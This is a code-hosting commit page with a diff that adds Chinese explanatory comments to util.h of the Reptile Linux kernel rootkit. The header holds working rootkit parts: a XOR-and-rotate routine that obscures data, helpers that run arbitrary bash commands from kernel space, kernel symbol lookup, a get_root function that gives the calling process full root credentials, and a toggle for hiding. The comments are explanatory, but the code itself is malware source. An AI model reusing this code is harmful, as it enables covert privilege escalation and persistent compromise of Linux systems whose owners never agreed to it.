py5ktlmgf
/
reptile
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

注释util.h

Browse Source
main^2
shou_gan_mian 2 months ago
parent 33a515b746
commit 372f2f875e
1 changed files with 58 additions and 39 deletions
Show Stats Download Patch File Download Diff File

97
src/Reptile/kernel/include/util.h
Unescape View File

@ -3,87 +3,106 @@
#include <linux/cred.h> #include <linux/cred.h>
#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 14, 0) #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 14, 0)
# include <linux/kmod.h> # include <linux/kmod.h> // 低于 4.14 的内核引入 kmod.h
#else #else
# include <linux/umh.h> # include <linux/umh.h> // 高于 4.14 的内核引入 umh.h
#endif #endif
#define do_encrypt(ptr, len, key) do_encode(ptr, len, key) // 定义加密和解密宏,调用相同的编码函数
#define do_decrypt(ptr, len, key) do_encode(ptr, len, key) #define do_encrypt(ptr, len, key) do_encode(ptr, len, key)
#define do_decrypt(ptr, len, key) do_encode(ptr, len, key)
// 循环左移操作
static inline unsigned int custom_rol32(unsigned int val, int n) static inline unsigned int custom_rol32(unsigned int val, int n)
{ {
return ((val << n) | (val >> (32 - n))); return ((val << n) | (val >> (32 - n))); // 将 val 左移 n 位,移出部分放到右边
} }
// 编码函数,可能用于加密或其他数据隐藏
static inline void do_encode(void *ptr, unsigned int len, unsigned int key) static inline void do_encode(void *ptr, unsigned int len, unsigned int key)
{ {
while (len > sizeof(key)) { while (len > sizeof(key)) {
*(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); *(unsigned int *)ptr ^= custom_rol32(key ^ len, (len % 13)); // 使用异或和循环左移对数据进行编码
len -= sizeof(key), ptr += sizeof(key); len -= sizeof(key);
} ptr += sizeof(key);
}
} }
// 执行用户模式程序,返回执行结果
static inline int exec(char **argv) static inline int exec(char **argv)
{ {
char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL}; char *envp[] = {"PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL};
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); // 执行外部程序并等待完成
} }
// 执行指定的 shell 命令
static inline int run_cmd(char *cmd) static inline int run_cmd(char *cmd)
{ {
char *argv[] = {"/bin/bash", "-c", cmd, NULL}; char *argv[] = {"/bin/bash", "-c", cmd, NULL};
return exec(argv); return exec(argv); // 调用 exec 函数执行命令
} }
static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, // 内核符号查找回调函数
unsigned long addr) static int ksym_lookup_cb(unsigned long data[], const char *name, void *module, unsigned long addr)
{ {
int i = 0; int i = 0;
while (!module && (((const char *)data[0]))[i] == name[i]) { while (!module && (((const char *)data[0]))[i] == name[i]) {
if (!name[i++]) if (!name[i++]) // 如果找到匹配的符号
return !!(data[1] = addr); return !!(data[1] = addr); // 返回符号地址
} }
return 0; return 0;
} }
// 查找内核符号名对应的地址
static inline unsigned long ksym_lookup_name(const char *name) static inline unsigned long ksym_lookup_name(const char *name)
{ {
unsigned long data[2] = {(unsigned long)name, 0}; unsigned long data[2] = {(unsigned long)name, 0};
kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); kallsyms_on_each_symbol((void *)ksym_lookup_cb, data); // 遍历内核符号查找
return data[1]; return data[1]; // 返回符号地址
} }
#ifdef CONFIG_GIVE_ROOT #ifdef CONFIG_GIVE_ROOT
// 提升当前进程权限为 root
static inline void get_root(void) static inline void get_root(void)
{ {
#if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29)
current->uid = 0; // 低版本内核(<2.6.29)直接设置进程的 UID/GID 等为 root 权限
current->suid = 0; current->uid = 0;
current->euid = 0; current->suid = 0;
current->gid = 0; current->euid = 0;
current->egid = 0; current->gid = 0;
current->fsuid = 0; current->egid = 0;
current->fsgid = 0; current->fsuid = 0;
cap_set_full(current->cap_effective); current->fsgid = 0;
cap_set_full(current->cap_inheritable); cap_set_full(current->cap_effective); // 设置所有权限
cap_set_full(current->cap_permitted); cap_set_full(current->cap_inheritable);
cap_set_full(current->cap_permitted);
#else #else
commit_creds(prepare_kernel_cred(0)); // 新版本内核通过 commit_creds 和 prepare_kernel_cred 来获取 root 权限
commit_creds(prepare_kernel_cred(0)); // 提升权限为 root
#endif #endif
} }
#endif #endif
extern int hidden; extern int hidden; // 外部声明的变量 hidden用于标记隐藏状态
// 切换 hidden 标志的值
static inline void flip_hidden_flag(void) static inline void flip_hidden_flag(void)
{ {
if (hidden) if (hidden)
hidden = 0; hidden = 0; // 如果当前是 1设置为 0
else else
hidden = 1; hidden = 1; // 如果当前是 0设置为 1
} }
// 声明的其他函数
int util_init(void); int util_init(void);
int get_cmdline(struct task_struct *task, char *buffer, int buflen); int get_cmdline(struct task_struct *task, char *buffer, int buflen);
//int run_cmd(const char *cmd); //int run_cmd(const char *cmd);
/*加密/解密处理:通过 do_encode 函数对数据进行处理。
使 ksym_lookup_name
get_root root
exec run_cmd shell
flip_hidden_flag hidden
*/

Write Preview
Loading…
Cancel
Save